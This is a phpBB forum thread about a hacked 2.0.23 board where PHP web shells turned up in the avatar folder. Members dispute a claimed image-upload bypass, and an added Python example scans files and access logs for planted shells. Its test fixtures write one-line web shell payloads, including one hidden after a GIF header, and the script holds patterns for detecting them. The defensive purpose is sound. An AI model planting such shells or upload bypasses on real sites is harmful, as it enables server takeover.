2.0.23 forum hacked, now what?
cif (Board Member, joined 13 Jul 2010, posts: 2)
Posted: Tue Jul 13, 2010 12:15 pm
Post subject: 2.0.23 forum hacked, now what?

Hi,

My forum was hacked and it seems that no harm was done to it.

Now my problem is to understand how and why it was hacked and what to do to "close it down".


Of course I will upgrade right now to phpbb 3, but I would like to understand what went wrong.


Does someone know any popular 2.0.23 exploit or something like that? (my password is quite strong and not used anywhere else)
Jim_UK (Board Member, joined 19 Nov 2008, posts: 656, location: North West UK)
Posted: Tue Jul 13, 2010 2:32 pm
Post subject: Re: 2.0.23 forum hacked, now what?

As far as I am aware there are no exploits of 2.0.23, but it may be that you have an out-of-date mod that is allowing access.
You have not said what form the hack took; doing so may well have given an insight into how they did it.
I take it you do not allow HTML in posts!!!

How strange for a hack to do no harm. Please describe the result of the hack.
Remember that a server can be hacked, giving access to all sites on that server. I had one such hack that placed a redirect to a phishing site onto all sites on the server. That hack was via an outdated cPanel and not phpBB2.

More info please.

Also be sure to check your install for any files or folders that have been recently uploaded. Do not just assume that the hack has gone.

Jim
dogs and things (Board Member, joined 18 Nov 2008, posts: 628, location: Spain)
Posted: Tue Jul 13, 2010 6:27 pm
Post subject: Re: 2.0.23 forum hacked, now what?

As Jim says,

Please give more details about what happened.

_________________
phpBB2 will never die, I hope!
cif (Board Member, joined 13 Jul 2010, posts: 2)
Posted: Wed Jul 14, 2010 10:43 am
Post subject: Re: 2.0.23 forum hacked, now what?

I don't know many more details.

I know someone took over my admin account and from my investigations there are some php web shells installed in my images/avatar folder.

I allow users to upload avatars. Was there any exploit for phpbb that allowed the user to upload a php file instead of an image file or something like that?
Salvatos (Board Member, joined 19 Feb 2009, posts: 449, location: Québec)
Posted: Wed Jul 14, 2010 2:58 pm
Post subject: Re: 2.0.23 forum hacked, now what?

I had a friend of a friend check for possible hacks on my board last year and he said he could upload a PHP file instead of an avatar by tricking the software into thinking it was an image file. He told me that if he uploaded the file from his computer instead of entering a URL, he got this elseif for verification (line 92 of includes/usercp_avatar.php):

Code:
else if ( ( file_exists(@phpbb_realpath($avatar_filename)) ) && preg_match('/\.(jpg|jpeg|gif|png)$/i', $avatar_realname) )


Which doesn't check the Content-Type of the file. If I remember correctly, copying these lines from includes/usercp_avatar.php somewhere into the elseif on line 192 and beyond was all it took to fix it. For some reason I didn't actually do it, maybe because I was keeping it for later because of my wrists. From line 155:

Code:
      if (!preg_match('#Content-Length\: ([0-9]+)[^ /][\s]+#i', $avatar_data, $file_data1) || !preg_match('#Content-Type\: image/[x\-]*([a-z]+)[\s]+#i', $avatar_data, $file_data2))
      {
         $error = true;
         $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['File_no_data'] : $lang['File_no_data'];
         return;
      }


If it's in the avatar folder, I guess that's how they may have done it.
lumpy burgertushie (Board Member, joined 18 Nov 2008, posts: 266)
Posted: Thu Jul 15, 2010 12:07 am
Post subject: Re: 2.0.23 forum hacked, now what?

That seems way too easy to not have been used before, and therefore it would have been known about by now.

I doubt that it is a valid vulnerability.

to the original poster:

Please provide a link to your board and maybe post the contents of one of those files here in a code box for us to look at.


robertt
Slackervaara (Board Member, joined 01 Jan 2009, posts: 70)
Posted: Thu Jul 15, 2010 12:22 am
Post subject: Re: 2.0.23 forum hacked, now what?

If you know what time you were hacked you could look in the access logs for your site, and they can reveal how the site was hacked. However, sometimes the hackers use keyloggers that are on your own PC, and then they can get the login details for FTP to the site and compromise the site with malware.
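The two triage steps suggested in this thread (Jim's "check your install for recently uploaded files" and the access-log review above), as an added example that is not part of any post and is not the poster's data: one function walks the avatar directory for files with a script extension or a PHP open tag and reports their modification times, the other reads Apache combined-format log lines for requests into the avatar directory that no browser loading an image would make. The directory layout, file names and log lines are constructed; the URL prefix /images/avatars/ is assumed from phpBB2's default avatar path.

```python
import os
import re
import tempfile
from datetime import datetime
from typing import Dict, List

# Added example (not phpBB code, not the poster's logs): triage helpers for a
# suspected web shell under the avatar directory. Everything below is constructed.

AVATAR_URL_PREFIX = "/images/avatars/"   # assumed phpBB2 default avatar path
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_TAGS = (b"<?php", b"<?=")

# Apache "combined" log format, as far as the check needs it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed log lines (documentation-range IPs, made-up times).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2010:22:41:03 -0400] "POST /profile.php?mode=editprofile HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jul/2010:22:41:20 -0400] "GET /images/avatars/1278988863.gif?c=id HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jul/2010:22:43:10 -0400] "GET /index.php HTTP/1.1" 200 14120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2010:01:02:55 -0400] "POST /images/avatars/c99.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
""".splitlines()


def scan_avatar_dir(root: str) -> List[Dict[str, str]]:
    """Flag files that have a script extension or carry a PHP open tag, with mtime."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                head = fh.read(65536)   # a tag buried deeper is unusual but possible
            reasons = []
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                reasons.append("script extension")
            if any(tag in head for tag in PHP_TAGS):
                reasons.append("php tag in content")
            if reasons:
                mtime = datetime.fromtimestamp(os.path.getmtime(full))
                findings.append({
                    "path": os.path.relpath(full, root).replace(os.sep, "/"),
                    "reason": ", ".join(reasons),
                    "mtime": mtime.isoformat(timespec="seconds"),
                })
    return sorted(findings, key=lambda f: f["path"])


def find_shell_hits(lines: List[str]) -> List[Dict[str, str]]:
    """Requests into the avatar directory with a script extension, a POST, or a query string."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.startswith(AVATAR_URL_PREFIX):
            continue
        ext = os.path.splitext(path)[1].lower()
        if ext in SCRIPT_EXTS or m.group("method") == "POST" or query:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "request": m.group("method") + " " + m.group("target")})
    # Earliest hit first: that is the time window (and source IP) to look at next.
    return sorted(hits, key=lambda h: datetime.strptime(h["ts"], "%d/%b/%Y:%H:%M:%S %z"))


def build_sample_tree() -> str:
    """Write a constructed avatar tree into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="avatars_")
    os.makedirs(os.path.join(root, "cache"))
    samples = {
        "legit.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
        "shell.php": b'<?php eval($_POST["x"]); ?>',
        "1278988863.gif": b'GIF89a\x01\x00\x01\x00\x80\x00\x00\n<?php system($_GET["c"]); ?>',
        "cache/.x.php": b"<?=`$_GET[c]`?>",
    }
    for rel, blob in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(blob)
    return root


if __name__ == "__main__":
    for f in scan_avatar_dir(build_sample_tree()):
        print("%-20s %-40s %s" % (f["path"], f["reason"], f["mtime"]))
    for h in find_shell_hits(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["request"])
```

On a real box, run `scan_avatar_dir` against the board's images/avatars with the web server's view of the files (not a copy pulled over FTP later, which resets the times), and feed `find_shell_hits` the full access log rather than a tail: the first flagged request gives the timestamp to work backwards from, and the requests from that IP just before it usually show the login or upload that planted the file.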
Acaria (Board Member, joined 20 Feb 2009, posts: 238)
Posted: Thu Jul 15, 2010 7:30 am
Post subject: Re: 2.0.23 forum hacked, now what?

I just tested that vulnerability you posted Salvatos and it doesn't work on my vanilla installation. I made a simple echo statement and changed the file extension to .png, but it still checked the filetype. I don't know how it worked for your friend, but it assuredly didn't work for me.
Salvatos (Board Member, joined 19 Feb 2009, posts: 449, location: Québec)
Posted: Thu Jul 15, 2010 12:33 pm
Post subject: Re: 2.0.23 forum hacked, now what?

Then I guess he was wrong. Or maybe you can do it if you also change the first bits of the file.
lumpy burgertushie (Board Member, joined 18 Nov 2008, posts: 266)
Posted: Mon Jul 19, 2010 3:32 am
Post subject: Re: 2.0.23 forum hacked, now what?

I am pretty sure he was simply wrong about it.

There have always been people that say that phpBB has vulnerabilities that prove to be incorrect.

phpbb3 has not been hacked yet and I don't think phpbb 2.0.24 has either.


robert
dogs and things (Board Member, joined 18 Nov 2008, posts: 628, location: Spain)
Posted: Mon Jul 19, 2010 6:52 am
Post subject: Re: 2.0.23 forum hacked, now what?

I agree,

If this was due to a vulnerability, it would have been done a long time ago, repeatedly, on many other boards, and it would have been fixed.

_________________
phpBB2 will never die, I hope!
Sylver Cheetah 53 (Board Member, joined 17 Dec 2008, posts: 426, location: Milky Way)
Posted: Tue Jul 20, 2010 9:40 pm
Post subject: Re: 2.0.23 forum hacked, now what?

I know that there are programs that can put another file into a jpg one.
_________________
phpBB2 forever!